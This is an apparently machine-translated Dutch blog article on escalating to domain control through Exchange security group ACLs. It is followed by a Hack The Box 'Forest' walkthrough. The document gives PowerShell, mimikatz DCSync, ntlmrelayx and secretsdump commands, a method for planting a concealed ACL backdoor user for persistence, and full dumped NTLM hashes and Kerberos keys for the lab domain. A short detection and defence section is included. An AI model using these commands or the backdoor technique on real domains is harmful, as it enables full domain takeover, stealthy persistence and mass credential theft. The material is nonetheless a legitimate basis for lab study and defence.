Exchange-AD-Privesc

Domeinpenetratie: gebruik specifieke ACL’s in de Exchange-server voor domeinescalatie

0x00


Een recent aangeleerde privilege-escalatietechniek in een domeinomgeving In een domeinomgeving wordt na de installatie van Exchange een OE met de naam Microsoft Exchange Security Groups toegevoegd, die twee speciale groepen omvat: Exchange Trusted Subsystem en Exchange Windows Permission . Nadat ze de besturingsrechten van een gebruiker in deze twee groepen hebben verkregen, kunnen ze de WriteDACL-machtigingen van de groep overnemen en vervolgens de ACL van het domeinobject wijzigen en ten slotte DCSync gebruiken om alle gebruikershashes in het domein te exporteren. Vervolgens kunt u de hash van de domeingebruiker krbtgt gebruiken om een ​​Golden Ticket te maken, in te loggen bij de domeincontroller en controle te krijgen over het hele domein.

Studiemateriaal:

https://github.com/gdedrouas/Exchange-AD-Privesc

Dit artikel registreert het herhalingsproces, introduceert het gebruik van dit mechanisme om een ​​achterdeur met privilege-escalatie tot stand te brengen, een gedetailleerde beschrijving van de bedieningsmethode van het domeinobject ACL met PowerView en ten slotte aanbevelingen voor detectie en verdediging.

0x01 Inleiding


Dit artikel heeft betrekking op het volgende:

  • Opnieuw verschijnen methode
  • Een achterdeur op hoogte instellen
  • Aanbevelingen voor detectie en verdediging

0x02 gereproduceerde methode


Testomgeving:

  • Server2012R2 x64
  • Exchange 2013

Voorkennis

1. Algemene afkortingen

  • DN: Distinguished Name
  • CN: gemeenschappelijke naam
  • OE: Organisatie-eenheid
  • DC: domeincomponent
  • ACE: toegangscontrole-invoer
  • ACL: toegangscontrolelijst

Het formaat van de verbindingsreeks van de LDAP-verbindingsserver is: ldap: // servernaam / DN

DN heeft drie kenmerken: CN, OU en DC.

2. Na het installeren van Exchange wordt standaard een OE met de naam Microsoft Exchange Security Groups toegevoegd

Zoals hieronder getoond

Alt-tekst

Deze omvatten twee speciale groepen: Exchange Trusted Subsystem en Exchange Windows Permission

Exchange Trusted Subsystem is lid van Exchange Windows Permission

Zoals hieronder getoond

Alt-tekst

Standaard heeft Exchange Windows Permissions WriteDACL-machtiging voor het domeinobject waarop Exchange is geïnstalleerd, dus Exchange Trusted Subsystem neemt deze machtiging ook over

3. Als u WriteDACL-machtiging hebt voor het domeinobject, kunt u ACE toevoegen voor de opgegeven domeingebruiker om de toestemming te verkrijgen om DCSync te gebruiken om de hash van alle gebruikers in het domein te exporteren. Vervolgens kunt u de hash van de domeingebruiker krbtgt gebruiken om een ​​Golden Ticket te maken en in te loggen bij de domeincontroller Krijg controle over het hele domein

Raadpleeg het vorige artikel voor meer informatie over “Domeinpenetratie-DCSync”

4. Gebruik PowerView om op ACL’s op domeinobjecten te werken

Het is vermeldenswaard dat er twee versies van PowerView zijn. Sommige functies worden alleen ondersteund in de dev-versie. De adressen van de twee versies zijn:

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1

Dit detail werd geïntroduceerd in het vorige artikel “Domain Penetration-AdminSDHolder”

Werkelijke test

Hier wordt het Exchange Trusted Subsystem gebruikt als testobject. Het wachtwoord van de testgebruiker testa is verkregen. Voeg eerst de testgebruiker testa toe aan het Exchange Trusted Subsystem .

Powershell-opdrachten zijn als volgt:

Import-Module ActiveDirectory Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members testa

Voor Windows-systemen zonder dat de Active Directory-module is geïnstalleerd, kunt u de Active Directory-module importeren met de volgende opdracht:

import-module .\Microsoft.ActiveDirectory.Management.dll Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members testa

Microsoft.ActiveDirectory.Management.dll werd gegenereerd na het installeren van de powershell-module Active Directory, ik heb het uitgepakt en geüpload naar github:

https://github.com/3gstudent/test/blob/master/Microsoft.ActiveDirectory.Management.dll

Nadat de toevoeging is geslaagd, volgt de volgende afbeelding

Alt-tekst

Voltooi vervolgens alle hoogtebewerkingen op de host in een ander domein

1. Login gebruiker testa

cmd:

runas /user:test\testa cmd

Als de testgebruikerstesta voor de eerste keer tijdens de test aan het Exchange Trusted Subsystem wordt toegevoegd, moet de gebruikerstesta opnieuw inloggen om de WriteDACL-machtiging te erven

Bekijk de groep waartoe gebruiker testa behoort:

whoami /groups

Het bleek dat gebruikerstesta zich met succes heeft aangesloten bij de Exchange Trusted Subsystem groep, zoals hieronder wordt getoond

Alt-tekst

2. Gebruik de DCSync-functie van mimikatz om de hash van gebruiker krbtgt te exporteren

cmd:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:krbtgt /csv" exit

De hash van gebruiker krbtgt is succesvol geëxporteerd, zoals hieronder getoond

Alt-tekst

Vervolgens kunt u de hash van de domeingebruiker krbtgt gebruiken om een ​​Golden Ticket te maken, in te loggen bij de domeincontroller en controle te krijgen over het hele domein

Succesvol verhoogd

Na verschillende tests werden de volgende conclusies getrokken:

Als u de machtigingen van een gebruiker in de volgende drie groepen hebt verkregen, kunt u DCSync gebruiken om de hash van alle gebruikers in het domein te exporteren

De groepsnamen zijn als volgt:

  • Exchange Trusted Subsystem
  • Exchange Windows-machtiging
  • Organisatie management

0x03 Methode voor het vaststellen van de achterdeur van de hoogte


Als u controle krijgt over het hele domein, kunt u ACL’s in Exchange gebruiken als achterdeur voor domeinverhoging

Methode 1: Voeg backdoor-gebruikers rechtstreeks toe aan de drie groepen Exchange

Hier is een voorbeeld van Exchange Trusted Subsystem

Powershell-opdrachten zijn als volgt:

Import-Module ActiveDirectory Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members testa

Maar het is niet verborgen genoeg, het is gemakkelijk te ontdekken door de toegevoegde gebruikers

De opdracht om te bekijken is als volgt:

net group "Exchange Trusted Subsystem" /domain

Methode 2: voeg alleen de beheerdersmachtigingen van specifieke gebruikers toe aan de drie groeps-ACL’s in Exchange

Hier is een voorbeeld van Exchange Trusted Subsystem

1. Eerst moet u de DN (Distinguished Name) van het Exchange Trusted Subsysteem vinden

Moet de dev-versie van Powerview gebruiken, het adres is als volgt:

https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1

Het Powershell-commando om alle DN’s te bekijken is als volgt:

Import-Module .\PowerView.ps1 Get-DomainObject -Properties distinguishedname |fl

De DN van het Exchange Trusted Subsystem is: CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com

2. Bekijk de ACL van het Exchange Trusted Subsystem

Powershell-opdrachten zijn als volgt:

Get-DomainObjectAcl -SearchBase "LDAP://CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com"

3. Verkrijg onbewerkte gegevens voor Exchange Trusted Subsystem

$RawObject = Get-DomainObject -SearchBase "LDAP://CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -Raw

4. Voeg backdoor-gebruiker testb toe met volledige toegang tot Exchange Trusted Subsystem

$RawObject = Get-DomainObject -SearchBase "LDAP://CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -Raw $TargetObject = $RawObject.GetDirectoryEntry() $ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity testb -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty $TargetObject.PsBase.ObjectSecurity.AddAccessRule($ACE) $TargetObject.PsBase.CommitChanges()

Hij voegde eraan toe:

Verwijder de backdoor-gebruiker testb voor volledige toegang tot het Exchange Trusted Subsystem :

$RawObject = Get-DomainObject -SearchBase "LDAP://CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -Raw $TargetObject = $RawObject.GetDirectoryEntry() $ACE = New-ADObjectAccessControlEntry -InheritanceType All -AccessControlType Allow -PrincipalIdentity testb -Right AccessSystemSecurity,CreateChild,Delete,DeleteChild,DeleteTree,ExtendedRight,GenericAll,GenericExecute,GenericRead,GenericWrite,ListChildren,ListObject,ReadControl,ReadProperty,Self,Synchronize,WriteDacl,WriteOwner,WriteProperty $TargetObject.PsBase.ObjectSecurity.RemoveAccessRule($ACE) $TargetObject.PsBase.CommitChanges()

5. Bekijk de zijkant van gebruiker testb

Get-DomainUser testb

Zoals hieronder getoond

Alt-tekst

Het objectid van gebruiker testb is S-1-5-21-1672228480-1396590849-334771951-2105

6. Bekijk de ACE behorende bij de nieuw toegevoegde gebruikerstestb

Get-DomainObjectAcl -SearchBase "LDAP://CN=Exchange Trusted Subsystem,OU=Microsoft Exchange Security Groups,DC=test,DC=com" | Where-Object {$_.SecurityIdentifier -eq "S-1-5-21-1672228480-1396590849-334771951-2105"}

Zoals hieronder getoond

Alt-tekst

Op dit punt is de backdoor succesvol geïnstalleerd

Bekijk gebruikers in de Exchange Trusted Subsystem groep:

net group "Exchange Trusted Subsystem" /domain

Kon de backdoor-gebruiker testb niet vinden

Backdoor opstartmethode

1. Login gebruiker testb op een host in een ander domein

cmd:

runas /user:test\testb cmd

2. Voeg gebruikerstestb toe aan Exchange Trusted Subsystem

Omdat gebruiker testb volledige toegang heeft tot het Exchange Trusted Subsystem , kan hij zichzelf toevoegen aan de Exchange Trusted Subsystem groep

Powershell-opdrachten zijn als volgt:

import-module .\Microsoft.ActiveDirectory.Management.dll Add-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members testb

3. Log opnieuw in op gebruiker testb

cmd:

runas /user:test\testb cmd

4. Gebruik de DCSync-functie van mimikatz om de hash van gebruiker krbtgt te exporteren

cmd:

mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.com /user:krbtgt /csv" exit

5. Verwijder gebruikerstestb uit de Exchange Trusted Subsystem-groep

Powershell-opdrachten zijn als volgt:

import-module .\Microsoft.ActiveDirectory.Management.dll Remove-ADGroupMember -Identity "Exchange Trusted Subsystem" -Members testb -confirm:$false

Aangezien gebruiker testb volledige toegang heeft tot het Exchange Trusted Subsystem , kan hij zichzelf herhaaldelijk toevoegen of verwijderen uit het Exchange Trusted Subsystem van Exchange Trusted Subsystem

0x04 Aanbevelingen voor detectie en verdediging


Fix vanuit de root: verwijder WriteDACL-machtigingen voor Exchange Windows Permissions

Referentiescript:

https://github.com/gdedrouas/Exchange-AD-Privesc/blob/master/DomainObject/Fix-DomainObjectDACL.ps1

Log detectie

Het geavanceerde beveiligingscontrolebeleid van Active Directory moet zijn ingeschakeld. Wanneer de ACL van het domeinobject wordt gewijzigd, wordt een logboek met ID 5136 gegenereerd.

Referenties:

https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/

0x05 samenvatting


Dit artikel registreert het proces van het gebruik van specifieke ACL’s in Exchange om bevoegdheden te escaleren, analyseert de gebruiksvoorwaarden, introduceert een gebruiksmethode van achterdeur met bevoegdheden in combinatie met dit mechanisme en geeft ten slotte aanbevelingen voor detectie en verdediging.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puckie IEstyle /add
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puckie /add /domain
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Trusted Subsystem" puckie /add /domain
The command completed successfully.
root@kali:~/htbntlmrelayx.py -t ldap://10.10.10.x --escalate-user puckie
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server

[*] Servers started, waiting for connections
[*] HTTPD: Received connection from 10.10.16.70, attacking target ldap://10.10.10.x
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.x as \svc-alfresco SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!
[*] HTTPD: Received connection from 10.10.16.70, attacking target ldap://10.10.10.x
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Received connection from 10.10.16.70, attacking target ldap://10.10.10.x
[*] HTTPD: Client requested path: /privexchange
[*] HTTPD: Client requested path: /privexchange
[*] Authenticating against ldap://10.10.10.x as \puckie SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD: Received connection from 10.10.16.70, attacking target ldap://10.10.10.x
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] Authenticating against ldap://10.10.10.x as \puckie SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD: Received connection from 10.10.16.70, attacking target ldap://10.10.10.x
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] HTTPD: Client requested path: /favicon.ico
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[*] Querying domain security descriptor
[*] Success! User puckie now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20191231-040251.restore
[*] Authenticating against ldap://10.10.10.x as \puckie SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue
[*] User privileges found: Create user
[*] User privileges found: Modifying domain ACL
[-] ACL attack already performed. Refusing to continue

login met de browser om ” puckie now has Replication-Get-Changes-All privileges on the domain” te verkrijgen.

root@kali:~/htb# secretsdump.py htb.local/puckie@10.10.10.x -just-dc
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
puckie:7601:aad3b435b51404eeaad3b435b51404ee:efa5a07679308f07dbbd0425a611e8ee:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:377fa4c2fd88cc89c29456d7a7ffbafd:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
puckie:aes256-cts-hmac-sha1-96:bd3030e501531ea49e1eadc4d4b113522b9ae939873118b85d144ae76e645acb
puckie:aes128-cts-hmac-sha1-96:b99355edb892b9af1adc50ccbb95b479
puckie:des-cbc-md5:5119d9ec3e324592
FOREST$:aes256-cts-hmac-sha1-96:1ff71a254e15600031cbe8d49a7160e96653c8651c905c275f7961e5b54a0fdb
FOREST$:aes128-cts-hmac-sha1-96:d5ca82d465bd0198ab5a797b8a791635
FOREST$:des-cbc-md5:c8132fbf73c71fa8
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

.

Netwerk diagram :

Gebruikte referentie : https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/

Gebruikte bestanden : https://github.com/puckiestyle/python/blob/master/privexchange.py

Auteur: Jacco Straathof